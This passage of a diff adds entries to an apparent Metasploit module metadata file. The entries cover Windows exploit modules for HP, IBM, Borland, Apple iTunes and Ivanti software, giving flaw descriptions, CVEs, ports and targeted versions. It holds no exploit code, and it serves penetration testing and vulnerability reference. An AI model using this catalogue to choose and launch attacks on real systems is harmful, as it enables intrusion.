+ "type": "exploit", + "author": [ + "Unknown", + "juan vazquez " + ], + "description": "This module exploits a stack buffer overflow in HP LoadRunner before 11.52. The\n vulnerability exists on the LoadRunner Agent Process magentproc.exe. 
By sending\n a specially crafted packet, an attacker may be able to execute arbitrary code.", + "references": [ + "CVE-2013-4800", + "OSVDB-95644", + "ZDI-13-169" + ], + "platform": "Windows", + "arch": "", + "rport": 443, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP3 / HP LoadRunner 11.50" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/hp_loadrunner_magentproc.rb", + "is_install_path": true, + "ref_name": "windows/misc/hp_loadrunner_magentproc", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/hp_loadrunner_magentproc_cmdexec": { + "name": "HP Mercury LoadRunner Agent magentproc.exe Remote Command Execution", + "fullname": "exploit/windows/misc/hp_loadrunner_magentproc_cmdexec", + "aliases": [], + "rank": 600, + "disclosure_date": "2010-05-06", + "type": "exploit", + "author": [ + "Unknown", + "aushack " + ], + "description": "This module exploits a remote command execution vulnerablity in HP LoadRunner before 9.50\n and also HP Performance Center before 9.50. 
HP LoadRunner 12.53 and other versions are\n also most likely vulneable if the (non-default) SSL option is turned off.\n By sending a specially crafted packet, an attacker can execute commands remotely.\n The service is vulnerable provided the Secure Channel feature is disabled (default).", + "references": [ + "CVE-2010-1549", + "ZDI-10-080", + "BID-39965", + "URL-https://support.hpe.com/hpsc/doc/public/display?docId=c00912968" + ], + "platform": "Windows", + "arch": "", + "rport": 54345, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows (Dropper)" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/hp_loadrunner_magentproc_cmdexec.rb", + "is_install_path": true, + "ref_name": "windows/misc/hp_loadrunner_magentproc_cmdexec", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/hp_magentservice": { + "name": "HP Diagnostics Server magentservice.exe Overflow", + "fullname": "exploit/windows/misc/hp_magentservice", + "aliases": [], + "rank": 200, + "disclosure_date": "2012-01-12", + "type": "exploit", + "author": [ + "AbdulAziz Hariri", + "hal" + ], + "description": "This module exploits a stack buffer overflow in HP Diagnostics Server\n magentservice.exe service. By sending a specially crafted packet, an attacker\n may be able to execute arbitrary code. 
Originally found and posted by\n AbdulAziz Harir via ZDI.", + "references": [ + "OSVDB-72815", + "CVE-2011-4789", + "ZDI-12-016" + ], + "platform": "Windows", + "arch": "", + "rport": 23472, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Diagnostics Server 9.10" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/hp_magentservice.rb", + "is_install_path": true, + "ref_name": "windows/misc/hp_magentservice", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/hp_omniinet_1": { + "name": "HP OmniInet.exe MSG_PROTOCOL Buffer Overflow", + "fullname": "exploit/windows/misc/hp_omniinet_1", + "aliases": [], + "rank": 500, + "disclosure_date": "2009-12-17", + "type": "exploit", + "author": [ + "EgiX ", + "Fairuzan Roslan ", + "jduck " + ], + "description": "This module exploits a stack-based buffer overflow in the Hewlett-Packard\n OmniInet NT Service. By sending a specially crafted MSG_PROTOCOL (0x010b)\n packet, a remote attacker may be able to execute arbitrary code with elevated\n privileges.\n\n This service is installed with HP OpenView Data Protector, HP Application\n Recovery Manager and potentially other products. This exploit has been tested\n against versions 6.1, 6.0, and 5.50 of Data Protector. and versions 6.0 and 6.1\n of Application Recovery Manager.\n\n NOTE: There are actually two consecutive wcscpy() calls in the program (which\n may be why ZDI considered them two separate issues). 
However, this module only\n exploits the first one.", + "references": [ + "CVE-2007-2280", + "BID-37396", + "OSVDB-61206", + "ZDI-09-099" + ], + "platform": "Windows", + "arch": "", + "rport": 5555, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic Targeting", + "HP OpenView Storage Data Protector A.05.50: INET, internal build 330", + "HP OpenView Storage Data Protector A.06.00: INET, internal build 331", + "HP StorageWorks Application Recovery Manager A.06.00: INET, internal build 81", + "HP Application Recovery Manager software A.06.10: INET, internal build 282" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/hp_omniinet_1.rb", + "is_install_path": true, + "ref_name": "windows/misc/hp_omniinet_1", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/hp_omniinet_2": { + "name": "HP OmniInet.exe MSG_PROTOCOL Buffer Overflow", + "fullname": "exploit/windows/misc/hp_omniinet_2", + "aliases": [], + "rank": 500, + "disclosure_date": "2009-12-17", + "type": "exploit", + "author": [ + "EgiX ", + "Fairuzan Roslan ", + "jduck " + ], + "description": "This module exploits a stack-based buffer overflow in the Hewlett-Packard\n OmniInet NT Service. By sending a specially crafted MSG_PROTOCOL (0x010b)\n packet, a remote attacker may be able to execute arbitrary code with elevated\n privileges.\n\n This service is installed with HP OpenView Data Protector, HP Application\n Recovery Manager and potentially other products. This exploit has been tested\n against versions 6.1, 6.0, and 5.50 of Data Protector. and versions 6.0 and 6.1\n of Application Recovery Manager.\n\n NOTE: There are actually two consecutive wcscpy() calls in the program (which\n may be why ZDI considered them two separate issues). 
However, this module only\n exploits the second one.", + "references": [ + "CVE-2009-3844", + "BID-37250", + "OSVDB-60852", + "ZDI-09-091" + ], + "platform": "Windows", + "arch": "", + "rport": 5555, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic Targeting", + "HP OpenView Storage Data Protector A.05.50: INET, internal build 330", + "HP OpenView Storage Data Protector A.06.00: INET, internal build 331", + "HP StorageWorks Application Recovery Manager A.06.00: INET, internal build 81", + "HP Application Recovery Manager software A.06.10: INET, internal build 282" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/hp_omniinet_2.rb", + "is_install_path": true, + "ref_name": "windows/misc/hp_omniinet_2", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/hp_omniinet_3": { + "name": "HP OmniInet.exe Opcode 27 Buffer Overflow", + "fullname": "exploit/windows/misc/hp_omniinet_3", + "aliases": [], + "rank": 500, + "disclosure_date": "2011-06-29", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a buffer overflow in the Hewlett-Packard\n OmniInet NT Service. 
By sending a specially crafted opcode 27 packet,\n a remote attacker may be able to execute arbitrary code.", + "references": [ + "CVE-2011-1865", + "OSVDB-73571", + "URL-http://www.coresecurity.com/content/HP-Data-Protector-multiple-vulnerabilities" + ], + "platform": "Windows", + "arch": "", + "rport": 5555, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "HP Data Protector A.06.10 Build 611 / A.06.11 Build 243" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/hp_omniinet_3.rb", + "is_install_path": true, + "ref_name": "windows/misc/hp_omniinet_3", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/hp_omniinet_4": { + "name": "HP OmniInet.exe Opcode 20 Buffer Overflow", + "fullname": "exploit/windows/misc/hp_omniinet_4", + "aliases": [], + "rank": 400, + "disclosure_date": "2011-06-29", + "type": "exploit", + "author": [ + "Oren Isacson", + "muts", + "dookie", + "sinn3r ", + "corelanc0d3r " + ], + "description": "This module exploits a vulnerability found in HP Data Protector's OmniInet\n process. By supplying a long string of data as the file path with opcode '20',\n a buffer overflow can occur when this data is being written on the stack where\n no proper bounds checking is done beforehand, which results arbitrary code\n execution under the context of SYSTEM. 
This module is also made against systems\n such as Windows Server 2003 or Windows Server 2008 that have DEP and/or ASLR\n enabled by default.", + "references": [ + "CVE-2011-1865", + "OSVDB-73571", + "EDB-17468", + "URL-http://www.coresecurity.com/content/HP-Data-Protector-multiple-vulnerabilities", + "URL-http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02872182" + ], + "platform": "Windows", + "arch": "", + "rport": 5555, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "HP Data Protector A.06.10 b611 / A.06.11 b243 XP SP3/Win2003/Win2008" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/hp_omniinet_4.rb", + "is_install_path": true, + "ref_name": "windows/misc/hp_omniinet_4", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/hp_operations_agent_coda_34": { + "name": "HP Operations Agent Opcode coda.exe 0x34 Buffer Overflow", + "fullname": "exploit/windows/misc/hp_operations_agent_coda_34", + "aliases": [], + "rank": 300, + "disclosure_date": "2012-07-09", + "type": "exploit", + "author": [ + "Luigi Auriemma", + "juan vazquez " + ], + "description": "This module exploits a buffer overflow vulnerability in HP Operations Agent for\n Windows. The vulnerability exists in the HP Software Performance Core Program\n component (coda.exe) when parsing requests for the 0x34 opcode. This module has\n been tested successfully on HP Operations Agent 11.00 over Windows XP SP3 and\n Windows 2003 SP2 (DEP bypass).\n\n The coda.exe components runs only for localhost by default, network access must be\n granted through its configuration to be remotely exploitable. 
On the other hand it\n runs on a random TCP port, to make easier reconnaissance a check function is\n provided.", + "references": [ + "CVE-2012-2019", + "OSVDB-83673", + "BID-54362", + "ZDI-12-114" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "HP Operations Agent 11.00 / Windows XP SP3", + "HP Operations Agent 11.00 / Windows 2003 SP2" + ], + "mod_time": "2017-07-24 06:26:21 +0000", + "path": "/modules/exploits/windows/misc/hp_operations_agent_coda_34.rb", + "is_install_path": true, + "ref_name": "windows/misc/hp_operations_agent_coda_34", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/hp_operations_agent_coda_8c": { + "name": "HP Operations Agent Opcode coda.exe 0x8c Buffer Overflow", + "fullname": "exploit/windows/misc/hp_operations_agent_coda_8c", + "aliases": [], + "rank": 300, + "disclosure_date": "2012-07-09", + "type": "exploit", + "author": [ + "Luigi Auriemma", + "juan vazquez " + ], + "description": "This module exploits a buffer overflow vulnerability in HP Operations Agent for\n Windows. The vulnerability exists in the HP Software Performance Core Program\n component (coda.exe) when parsing requests for the 0x8c opcode. This module has\n been tested successfully on HP Operations Agent 11.00 over Windows XP SP3 and\n Windows 2003 SP2 (DEP bypass).\n\n The coda.exe components runs only for localhost by default, network access must be\n granted through its configuration to be remotely exploitable. 
On the other hand it\n runs on a random TCP port, to make easier reconnaissance a check function is\n provided.", + "references": [ + "CVE-2012-2020", + "OSVDB-83674", + "BID-54362", + "ZDI-12-115" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "HP Operations Agent 11.00 / Windows XP SP3", + "HP Operations Agent 11.00 / Windows 2003 SP2" + ], + "mod_time": "2017-07-24 06:26:21 +0000", + "path": "/modules/exploits/windows/misc/hp_operations_agent_coda_8c.rb", + "is_install_path": true, + "ref_name": "windows/misc/hp_operations_agent_coda_8c", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/hp_ovtrace": { + "name": "HP OpenView Operations OVTrace Buffer Overflow", + "fullname": "exploit/windows/misc/hp_ovtrace", + "aliases": [], + "rank": 200, + "disclosure_date": "2007-08-09", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in HP OpenView Operations version A.07.50.\n By sending a specially crafted packet, a remote attacker may be able to execute arbitrary code.", + "references": [ + "CVE-2007-3872", + "OSVDB-39527", + "BID-25255" + ], + "platform": "Windows", + "arch": "", + "rport": 5051, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows 2000 Advanced Server All English" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/hp_ovtrace.rb", + "is_install_path": true, + "ref_name": "windows/misc/hp_ovtrace", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/hta_server": { + "name": "HTA Web Server", + "fullname": "exploit/windows/misc/hta_server", + "aliases": [], + "rank": 0, + "disclosure_date": "2016-10-06", + "type": 
"exploit", + "author": [ + "Spencer McIntyre" + ], + "description": "This module hosts an HTML Application (HTA) that when opened will run a\n payload via Powershell. When a user navigates to the HTA file they will\n be prompted by IE twice before the payload is executed.", + "references": [ + "URL-https://www.trustedsec.com/july-2015/malicious-htas/" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Powershell x86", + "Powershell x64" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/hta_server.rb", + "is_install_path": true, + "ref_name": "windows/misc/hta_server", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "SideEffects": [ + "screen-effects" + ], + "Stability": [ + "crash-safe" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/ib_isc_attach_database": { + "name": "Borland InterBase isc_attach_database() Buffer Overflow", + "fullname": "exploit/windows/misc/ib_isc_attach_database", + "aliases": [], + "rank": 400, + "disclosure_date": "2007-10-03", + "type": "exploit", + "author": [ + "Ramon de C Valle ", + "Adriano Lima " + ], + "description": "This module exploits a stack buffer overflow in Borland InterBase\n by sending a specially crafted attach request.", + "references": [ + "CVE-2007-5243", + "OSVDB-38607", + "BID-25917", + "URL-http://www.risesecurity.org/advisories/RISE-2007002.txt" + ], + "platform": "Windows", + "arch": "x86", + "rport": 3050, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Brute Force", + "Borland InterBase WI-V8.1.0.257", + "Borland InterBase WI-V8.0.0.123", + "Borland InterBase WI-V7.5.0.129 WI-V7.5.1.80", + "Borland InterBase WI-V7.0.1.1", + "Borland InterBase WI-V6.5.0.28", + "Borland InterBase WI-V6.0.1.6", + "Borland InterBase WI-V6.0.0.627 WI-V6.0.1.0 WI-O6.0.1.6 WI-O6.0.2.0", + "Borland InterBase 
WI-V5.5.0.742", + "Borland InterBase WI-V5.1.1.680", + "Debug" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/ib_isc_attach_database.rb", + "is_install_path": true, + "ref_name": "windows/misc/ib_isc_attach_database", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/ib_isc_create_database": { + "name": "Borland InterBase isc_create_database() Buffer Overflow", + "fullname": "exploit/windows/misc/ib_isc_create_database", + "aliases": [], + "rank": 400, + "disclosure_date": "2007-10-03", + "type": "exploit", + "author": [ + "Ramon de C Valle ", + "Adriano Lima " + ], + "description": "This module exploits a stack buffer overflow in Borland InterBase\n by sending a specially crafted create request.", + "references": [ + "CVE-2007-5243", + "OSVDB-38606", + "BID-25917", + "URL-http://www.risesecurity.org/advisories/RISE-2007002.txt" + ], + "platform": "Windows", + "arch": "x86", + "rport": 3050, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Brute Force", + "Borland InterBase WI-V8.1.0.257", + "Borland InterBase WI-V8.0.0.123", + "Borland InterBase WI-V7.5.0.129 WI-V7.5.1.80", + "Borland InterBase WI-V7.0.1.1", + "Borland InterBase WI-V6.5.0.28", + "Borland InterBase WI-V6.0.1.6", + "Borland InterBase WI-V6.0.0.627 WI-V6.0.1.0 WI-O6.0.1.6 WI-O6.0.2.0", + "Borland InterBase WI-V5.5.0.742", + "Borland InterBase WI-V5.1.1.680", + "Debug" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/ib_isc_create_database.rb", + "is_install_path": true, + "ref_name": "windows/misc/ib_isc_create_database", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/ib_svc_attach": { + "name": "Borland InterBase SVC_attach() Buffer Overflow", + "fullname": 
"exploit/windows/misc/ib_svc_attach", + "aliases": [], + "rank": 400, + "disclosure_date": "2007-10-03", + "type": "exploit", + "author": [ + "Ramon de C Valle ", + "Adriano Lima " + ], + "description": "This module exploits a stack buffer overflow in Borland InterBase\n by sending a specially crafted service attach request.", + "references": [ + "CVE-2007-5243", + "OSVDB-38605", + "BID-25917", + "URL-http://www.risesecurity.org/advisories/RISE-2007002.txt" + ], + "platform": "Windows", + "arch": "x86", + "rport": 3050, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Brute Force", + "Borland InterBase WI-V8.1.0.257", + "Borland InterBase WI-V8.0.0.123", + "Borland InterBase WI-V7.5.0.129 WI-V7.5.1.80", + "Borland InterBase WI-V7.0.1.1", + "Borland InterBase WI-V6.5.0.28", + "Borland InterBase WI-V6.0.1.6", + "Borland InterBase WI-V6.0.0.627 WI-V6.0.1.0 WI-O6.0.1.6 WI-O6.0.2.0", + "Borland InterBase WI-V5.5.0.742", + "Borland InterBase WI-V5.1.1.680", + "Debug" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/ib_svc_attach.rb", + "is_install_path": true, + "ref_name": "windows/misc/ib_svc_attach", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/ibm_cognos_tm1admsd_bof": { + "name": "IBM Cognos tm1admsd.exe Overflow", + "fullname": "exploit/windows/misc/ibm_cognos_tm1admsd_bof", + "aliases": [], + "rank": 300, + "disclosure_date": "2012-04-02", + "type": "exploit", + "author": [ + "Unknown", + "juan vazquez " + ], + "description": "This module exploits a stack buffer overflow in IBM Cognos Analytic Server\n Admin service. The vulnerability exists in the tm1admsd.exe component, due to a\n dangerous copy of user controlled data to the stack, via memcpy, without validating\n the supplied length and data. 
The module has been tested successfully on IBM Cognos\n Express 9.5 over Windows XP SP3.", + "references": [ + "CVE-2012-0202", + "OSVDB-80876", + "BID-52847", + "ZDI-12-101", + "URL-http://www-01.ibm.com/support/docview.wss?uid=swg21590314" + ], + "platform": "Windows", + "arch": "", + "rport": 5498, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "IBM Cognos Express 9.5 / Windows XP SP3" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/ibm_cognos_tm1admsd_bof.rb", + "is_install_path": true, + "ref_name": "windows/misc/ibm_cognos_tm1admsd_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/ibm_director_cim_dllinject": { + "name": "IBM System Director Agent DLL Injection", + "fullname": "exploit/windows/misc/ibm_director_cim_dllinject", + "aliases": [], + "rank": 600, + "disclosure_date": "2009-03-10", + "type": "exploit", + "author": [ + "Bernhard Mueller", + "kingcope", + "juan vazquez " + ], + "description": "This module abuses the \"wmicimsv\" service on IBM System Director Agent 5.20.3\n to accomplish arbitrary DLL injection and execute arbitrary code with SYSTEM\n privileges.\n\n In order to accomplish remote DLL injection it uses a WebDAV service as disclosed\n by kingcope on December 2012. Because of this, the target host must have the\n WebClient service (WebDAV Mini-Redirector) enabled. 
It is enabled and automatically\n started by default on Windows XP SP3, but disabled by default on Windows 2003 SP2.", + "references": [ + "CVE-2009-0880", + "OSVDB-52616", + "OSVDB-88102", + "BID-34065", + "URL-https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20090305-2_IBM_director_privilege_escalation.txt", + "URL-https://seclists.org/bugtraq/2012/Dec/5" + ], + "platform": "Windows", + "arch": "", + "rport": 6988, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "IBM System Director Agent 5.20.3 / Windows with WebClient enabled" + ], + "mod_time": "2018-09-15 18:54:45 +0000", + "path": "/modules/exploits/windows/misc/ibm_director_cim_dllinject.rb", + "is_install_path": true, + "ref_name": "windows/misc/ibm_director_cim_dllinject", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/ibm_tsm_cad_ping": { + "name": "IBM Tivoli Storage Manager Express CAD Service Buffer Overflow", + "fullname": "exploit/windows/misc/ibm_tsm_cad_ping", + "aliases": [], + "rank": 400, + "disclosure_date": "2009-11-04", + "type": "exploit", + "author": [ + "jduck " + ], + "description": "This module exploits a stack buffer overflow in the IBM Tivoli Storage Manager Express CAD Service.\n By sending a \"ping\" packet containing a long string, an attacker can execute arbitrary code.\n\n NOTE: the dsmcad.exe service must be in a particular state (CadWaitingStatus = 1) in order\n for the vulnerable code to be reached. This state doesn't appear to be reachable when the\n TSM server is not running. 
This service does not restart.", + "references": [ + "CVE-2009-3853", + "OSVDB-59632" + ], + "platform": "Windows", + "arch": "", + "rport": 1582, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "IBM Tivoli Storage Manager Express 5.3.6.2" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/ibm_tsm_cad_ping.rb", + "is_install_path": true, + "ref_name": "windows/misc/ibm_tsm_cad_ping", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/ibm_tsm_rca_dicugetidentify": { + "name": "IBM Tivoli Storage Manager Express RCA Service Buffer Overflow", + "fullname": "exploit/windows/misc/ibm_tsm_rca_dicugetidentify", + "aliases": [], + "rank": 500, + "disclosure_date": "2009-11-04", + "type": "exploit", + "author": [ + "jduck " + ], + "description": "This module exploits a stack buffer overflow in the IBM Tivoli Storage Manager Express Remote\n Client Agent service. By sending a \"dicuGetIdentify\" request packet containing a long\n NodeName parameter, an attacker can execute arbitrary code.\n\n NOTE: this exploit first connects to the CAD service to start the RCA service and obtain\n the port number on which it runs. 
This service does not restart.", + "references": [ + "CVE-2008-4828", + "OSVDB-54232", + "BID-34803" + ], + "platform": "Windows", + "arch": "", + "rport": 1582, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "IBM Tivoli Storage Manager Express 5.3.6.2" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/ibm_tsm_rca_dicugetidentify.rb", + "is_install_path": true, + "ref_name": "windows/misc/ibm_tsm_rca_dicugetidentify", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/ibm_websphere_java_deserialize": { + "name": "IBM WebSphere RCE Java Deserialization Vulnerability", + "fullname": "exploit/windows/misc/ibm_websphere_java_deserialize", + "aliases": [], + "rank": 600, + "disclosure_date": "2015-11-06", + "type": "exploit", + "author": [ + "Liatsis Fotios " + ], + "description": "This module exploits a vulnerability in IBM's WebSphere Application Server. An unsafe deserialization\n call of unauthenticated Java objects exists to the Apache Commons Collections (ACC) library, which allows\n remote arbitrary code execution. 
Authentication is not required in order to exploit this vulnerability.", + "references": [ + "CVE-2015-7450", + "URL-https://github.com/frohoff/ysoserial/blob/master/src/main/java/ysoserial/payloads/CommonsCollections1.java", + "URL-http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability", + "URL-https://www.tenable.com/plugins/index.php?view=single&id=87171" + ], + "platform": "Windows", + "arch": "", + "rport": "8880", + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "IBM WebSphere 7.0.0.0" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/ibm_websphere_java_deserialize.rb", + "is_install_path": true, + "ref_name": "windows/misc/ibm_websphere_java_deserialize", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/itunes_extm3u_bof": { + "name": "Apple iTunes 10 Extended M3U Stack Buffer Overflow", + "fullname": "exploit/windows/misc/itunes_extm3u_bof", + "aliases": [], + "rank": 300, + "disclosure_date": "2012-06-21", + "type": "exploit", + "author": [ + "Rh0 ", + "sinn3r " + ], + "description": "This module exploits a stack buffer overflow in iTunes 10.4.0.80 to 10.6.1.7.\n When opening an extended .m3u file containing an \"#EXTINF:\" tag description,\n iTunes will copy the content after \"#EXTINF:\" without appropriate checking\n from a heap buffer to a stack buffer, writing beyond the stack buffer's boundary,\n which allows code execution under the context of the user.\n\n Please note before using this exploit, you must have precise knowledge of the\n victim machine's QuickTime version (if installed), and then select your target\n accordingly.\n\n In addition, even though this exploit can be used as remote, you 
should be aware\n the victim's browser behavior when opening an itms link. For example,\n IE/Firefox/Opera by default will ask the user for permission before launching the\n itms link by iTunes. Chrome will ask for permission, but also spits a warning.\n Safari would be an ideal target, because it will open the link without any\n user interaction.", + "references": [ + "OSVDB-83220", + "EDB-19322", + "URL-http://pastehtml.com/view/c25uhk4ab.html" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "iTunes 10.4.0.80 to 10.6.1.7 with QuickTime 7.69 on XP SP3", + "iTunes 10.4.0.80 to 10.6.1.7 with QuickTime 7.70 on XP SP3", + "iTunes 10.4.0.80 to 10.6.1.7 with QuickTime 7.71 on XP SP3", + "iTunes 10.4.0.80 to 10.6.1.7 with QuickTime 7.72 on XP SP3" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/itunes_extm3u_bof.rb", + "is_install_path": true, + "ref_name": "windows/misc/itunes_extm3u_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/ivanti_agent_portal_cmdexec": { + "name": "Ivanti EPM Agent Portal Command Execution", + "fullname": "exploit/windows/misc/ivanti_agent_portal_cmdexec", + "aliases": [], + "rank": 600, + "disclosure_date": "2023-06-07", + "type": "exploit", + "author": [ + "James Horseman", + "Zach Hanley", + "Spencer McIntyre" + ], + "description": "This module leverages an unauthenticated RCE in Ivanti's EPM Agent Portal where a RPC client can invoke a method\n which will run an attacker-specified string on the remote target as NT AUTHORITY\\SYSTEM.\n This vulnerability is present in versions prior to EPM 2021.1 Su4 and EPM 2022 Su2.", + "references": [ + "CVE-2023-28324", + "URL-https://forums.ivanti.com/s/article/SA-2023-06-06-CVE-2023-28324?language=en_US", + 
"URL-https://github.com/horizon3ai/CVE-2023-28324" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic" + ], + "mod_time": "2024-11-20 13:51:39 +0000", + "path": "/modules/exploits/windows/misc/ivanti_agent_portal_cmdexec.rb", + "is_install_path": true, + "ref_name": "windows/misc/ivanti_agent_portal_cmdexec", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [ + "repeatable-session" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/ivanti_avalanche_mdm_bof": { + "name": "Ivanti Avalanche MDM Buffer Overflow", + "fullname": "exploit/windows/misc/ivanti_avalanche_mdm_bof", + "aliases": [], + "rank": 600, + "disclosure_date": "2023-08-14", + "type": "exploit", + "author": [ + "Ege BALCI egebalci ", + "A researcher at Tenable" + ], + "description": "This module exploits a buffer overflow condition in Ivanti Avalanche MDM versions before v6.4.1.\n An attacker can send a specially crafted message to the Wavelink Avalanche Manager,\n which could result in arbitrary code execution with the NT/AUTHORITY SYSTEM permissions.\n This vulnerability occurs during the processing of 3/5/8/100/101/102 item data types.\n The program tries to copy the item data using `qmemcopy` to a fixed size data buffer on stack.\n Upon successful exploitation the attacker gains full access to the target system.\n\n This vulnerability has been tested against Ivanti Avalanche MDM v6.4.0.0 on Windows 10.", + "references": [ + "CVE-2023-32560", + "URL-https://www.tenable.com/security/research/tra-2023-27", + "URL-https://forums.ivanti.com/s/article/Avalanche-Vulnerabilities-Addressed-in-6-4-1" + ], + "platform": "Windows", + "arch": "x86", + "rport": 1777, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Ivanti Avalanche <= v6.4.0.0" + ], + 
